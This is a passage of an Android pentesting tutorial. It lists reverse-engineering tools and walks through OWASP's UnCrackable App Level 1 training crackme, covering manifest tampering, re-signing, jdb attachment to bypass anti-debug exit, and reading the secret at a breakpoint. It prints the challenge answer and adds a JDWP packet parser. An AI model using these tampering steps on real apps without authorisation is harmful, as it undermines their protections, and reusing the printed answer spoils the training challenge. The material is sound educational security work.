dex2jar — A free tool for converting bytecode from the .dex format into Java class files. JD-GUI — One of the tools created by the Java Decompiler project. This graphical utility makes Java source code readable, displaying it as Java class files. Mobexler — An Elementary-based virtual machine for iOS and Android pentesting. Mobexler comes with a set of preinstalled tools and scripts for testing the security of a mobile app, including some of the tools from this list. Java Debugger (jdb) — A free command-line tool for debugging Java classes. Note: In Android applications, debugging can be performed on two layers: Runtime layer — Java runtime debugging can be performed with the help of the Java Debug Wire Protocol (JDWP). Native layer — Linux/Unix-style debugging can be performed based on ptrace. JDWP is a standard debugging protocol that helps the debugger communicate with the target JVM. This protocol is supported by all popular command-line tools and Java IDEs, including Eclipse, JEB, IntelliJ, and, of course, jbd. The JDWP debugger allows you to explore Java code, set breakpoints in Java methods, and check and modify both local and instance variables. It’s often used for debugging regular Android apps that doesn’t make many calls to native libraries. GNU Debugger (gdb) — A useful tool for analyzing an application’s code. We used these tools to solve two reverse engineering challenges for Android apps. In the next section, we’ll give you a basic Android pentesting tutorial based on the standard OWASP challenges. Solving UnCrackable Apps challenges We'll show you how to solve two OWASP MSTG CrackMe challenges: UnCrackable App for Android Level 1 and UnCrackable App for Android Level 2. These apps were specifically designed as reverse engineering challenges with secrets hidden in the code. Our task is to find these secrets. 
While solving these challenges, we’ll use static analysis for analyzing the decompiled code and dynamic analysis for modifying some of the application parameters.

Solving UnCrackable App for Android Level 1

First, we need to look inside our training application. A regular Android application is, in fact, a properly packaged APK file containing all the data the application needs to operate normally. To look at the application from the inside and solve this challenge, we’ll need:

  • adb for communicating with our mobile device and the training application
  • Apktool for disassembling the APK files of our training app into separate .smali classes
  • jdb for debugging our training app
  • dex2jar for converting APK files to the JAR format
  • JD-GUI for working with the JAR files

Now let’s move on to solving the first challenge. We’ll begin by installing UnCrackable-Level1.apk on our device or emulator with the following command:

    $ adb install UnCrackable-Level1.apk

We’ll solve this challenge and debug the Release Android app with the help of the jdb tool. Follow along to find the hidden secret.

1. Unpack the application and decode the manifest file using Apktool:

    $ apktool d -s UnCrackable-Level1.apk -o temp

2. Using a text editor, put the app into debugging mode by changing the manifest file and setting android:debuggable to "true":

    <application android:allowBackup="true" android:debuggable="true"
                 android:icon="@mipmap/ic_launcher" android:label="@string/app_name"
                 android:theme="@style/AppTheme">

3. Use Apktool to repack the APK file:

    $ apktool b temp -o UnCrackable-Level1-Repackage.apk

4. Re-sign the newly created APK file. You can do this using a bash script for re-signing Android apps.

5. Install the new APK file on your device or emulator with the following command:

    $ adb install UnCrackable-Level1-Repackage-Resigned.apk

At this point, we face the first big challenge. The UnCrackable App is designed to resist debugging mode. So when we enable it, the app simply shuts down.
You’ll see a modal dialog with a warning. The dialog can be closed by tapping OK, but this will be your last action before the app is terminated. Fortunately enough, there’s a way to fix this.

6. Launch the application on your device or emulator in Wait For Debugger mode. This mode allows you to connect the debugger to the target application before the application runs its detection mechanism. As a result, the app won’t deactivate the debugging mode. Run the application in Wait For Debugger mode with this command:

    $ adb shell am start -D -n "owasp.mstg.uncrackable1/sg.vantagepoint.uncrackable1.MainActivity"

7. Now display the process IDs (PIDs) of all processes that run on the connected device:

    $ adb shell ps

8. And list only debuggable processes:

    $ adb jdwp

9. Open a listening socket on your host machine and forward its incoming TCP connections to the JDWP transport of a chosen debuggable process:

    $ adb forward tcp:4321 jdwp:PID

10. Note that attaching the debugger (in our case, jdb) will cause the application to resume from the suspended state, and we don’t want that. We need to keep the app suspended for a while to explore it in detail. To prevent the process from resuming, pipe the suspend command into jdb:

    > "%JAVA_HOME%\bin\jdb" -connect com.sun.jdi.SocketAttach:hostname=localhost,port=4321
    Set uncaught java.lang.Throwable
    Set deferred uncaught java.lang.Throwable
    Initializing jdb ...
    > suspend
    All threads suspended.
    >

11. Now we need to bypass the point at which the application exits at runtime after you tap OK. Decompile the APK file to review the application code using dex2jar and JD-GUI:

1) Use the dex2jar tool to convert the original APK file to a JAR file:

    $ d2j-dex2jar.bat -f UnCrackable-Level1.apk

2) Using the JD-GUI tool, open the newly created JAR file:

    public class MainActivity extends Activity {
        private void a(String str) {
            AlertDialog create = new Builder(this).create();
            create.setTitle(str);
            create.setMessage("This is unacceptable. The app is now going to exit.");
            // -3 is DialogInterface.BUTTON_NEUTRAL
            create.setButton(-3, "OK", new OnClickListener() {
                public void onClick(DialogInterface dialogInterface, int i) {
                    System.exit(0);
                }
            });
            create.setCancelable(false);
            create.show();
        }
        // ... remaining members omitted
    }

After reviewing the code, you’ll see that the MainActivity.a method displays the message: "This is unacceptable..."

The MainActivity.a method creates an alert dialog and sets a listener class for the onClick event. The listener class has a callback method that shuts down the application when the user taps the OK button. To prevent a user from canceling the dialog, the system calls the setCancelable method.

At this point, our best-case scenario is to suspend the application in a state where the secret string we’re looking for is stored in a plaintext variable. Unfortunately, that’s impossible unless you can figure out how the application detects root and tampering.

12. Try tampering with the runtime a little bit to bypass application termination. Set a method breakpoint on android.app.Dialog.setCancelable when the application is still suspended, then resume the app:

    All threads suspended.
    > stop in android.app.Dialog.setCancelable
    Set breakpoint android.app.Dialog.setCancelable
    > resume
    All threads resumed.
    > Breakpoint hit: "thread=main", android.app.Dialog.setCancelable(), line=1,205 bci=0
    main[1] _

13. The application is suspended at the first setCancelable method instruction. You can use the locals command to print the arguments passed to the setCancelable method:

    main[1] locals
    Method arguments:
    flag = true
    Local variables:
    main[1] _

As you can see in the output above, the system called the setCancelable(true) method, so that’s not the call we need. Let’s resume the process with the resume command:

    main[1] resume
    All threads resumed.
    > Breakpoint hit: "thread=main", android.app.Dialog.setCancelable(), line=1,205 bci=0
    main[1] locals
    Method arguments:
    flag = false
    Local variables:
    main[1] _

We’ve reached a call to the setCancelable method with the false argument. At this point, we need to use the set command to change the variable to true and resume the app:

    main[1] set flag = true
    flag = true = true
    main[1] resume
    All threads resumed.
    > Breakpoint hit: "thread=main", android.app.Dialog.setCancelable(), line=1,205 bci=0
    main[1] _

Continue setting flag to true each time you reach a breakpoint until the alert window is finally displayed. It may take about five or six attempts before you see this window. At this point, you should be able to cancel the dialog without causing the application to terminate — just tap the screen next to the dialog window and it will close.

14. Finally, it’s time to extract the secret string. Look at the application code once more. You’ll notice that the string we’re looking for is decrypted with the Advanced Encryption Standard and is compared with the string the user enters into the message box. The application uses the equals method of the java.lang.String class to determine if the string input matches the secret string.

Now set a method breakpoint on java.lang.String.equals, enter random text in the edit field, and tap VERIFY. You can read the method argument with the locals command once you reach the breakpoint:

    > stop in java.lang.String.equals
    Set breakpoint java.lang.String.equals
    > Breakpoint hit: "thread=main", java.lang.String.equals(), line=944 bci=2
    main[1] locals
    Method arguments:
    anObject = "b"
    Local variables:
    main[1] cont
    > Breakpoint hit: "thread=main", java.lang.String.equals(), line=944 bci=2
    main[1] locals
    Method arguments:
    anObject = "i"
    Local variables:
    main[1] _
    ………
    main[1] locals
    Method arguments:
    anObject = "I want to believe"
    Local variables:
    main[1] _

Bingo!
Our secret string is “I want to believe”. You can easily check if that’s right by entering this phrase into the message box and clicking the VERIFY button.

OK, the next part will be uploaded soon. Thank you, my friends.
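The JDWP description in the tool list and the debugger attachment in steps 9 and 10 both rest on a small wire format: a 14-byte handshake followed by packets with an 11-byte header. The Python below is an added example, not code from the original post or from any of the tools named; it builds and parses the handshake and the VirtualMachine Suspend/Resume packets (the requests a debugger issues when it suspends and resumes the whole VM) on constructed bytes, and its function names and sample streams are assumptions made for illustration.

```python
import struct

HANDSHAKE = b"JDWP-Handshake"   # sent by the debugger, echoed back by the VM
HEADER_LEN = 11                 # length(4) id(4) flags(1) + 2 type-specific bytes
REPLY_FLAG = 0x80
# Subset of the VirtualMachine command set (set 1) from the JDWP specification.
VM_COMMANDS = {1: "Version", 8: "Suspend", 9: "Resume", 10: "Exit"}


def build_command(packet_id, cmd_set, cmd, data=b""):
    """Serialise a command packet; every field is big-endian."""
    return struct.pack(">IIBBB", HEADER_LEN + len(data), packet_id, 0, cmd_set, cmd) + data


def build_reply(packet_id, error_code=0, data=b""):
    """Serialise a reply packet; it reuses the id of the command it answers."""
    return struct.pack(">IIBH", HEADER_LEN + len(data), packet_id, REPLY_FLAG, error_code) + data


def parse_stream(buf):
    """Decode one direction of a JDWP connection into a list of dicts."""
    if not buf.startswith(HANDSHAKE):
        raise ValueError("not JDWP: handshake missing")
    pos, packets = len(HANDSHAKE), []
    while pos < len(buf):
        if len(buf) - pos < HEADER_LEN:
            raise ValueError("truncated JDWP header")
        length, packet_id, flags = struct.unpack_from(">IIB", buf, pos)
        if length < HEADER_LEN or pos + length > len(buf):
            raise ValueError("bad JDWP length field")
        if flags & REPLY_FLAG:
            (error,) = struct.unpack_from(">H", buf, pos + 9)
            packets.append({"type": "reply", "id": packet_id, "error": error})
        else:
            cmd_set, cmd = struct.unpack_from(">BB", buf, pos + 9)
            name = VM_COMMANDS.get(cmd, "?") if cmd_set == 1 else "?"
            packets.append({"type": "command", "id": packet_id,
                            "set": cmd_set, "cmd": cmd, "name": name})
        pos += length
    return packets


# Constructed sample streams (not captured from a device): a whole-VM suspend
# followed by a resume, and the VM's success replies.
DEBUGGER_TO_VM = HANDSHAKE + build_command(1, 1, 8) + build_command(2, 1, 9)
VM_TO_DEBUGGER = HANDSHAKE + build_reply(1) + build_reply(2)

if __name__ == "__main__":
    for pkt in parse_stream(DEBUGGER_TO_VM) + parse_stream(VM_TO_DEBUGGER):
        print(pkt)
```

A listening port or capture that begins with this handshake belongs to a debuggable VM, which is the state the android:debuggable change in step 2 creates, so the same parser can serve as a check that release builds and production devices never answer it.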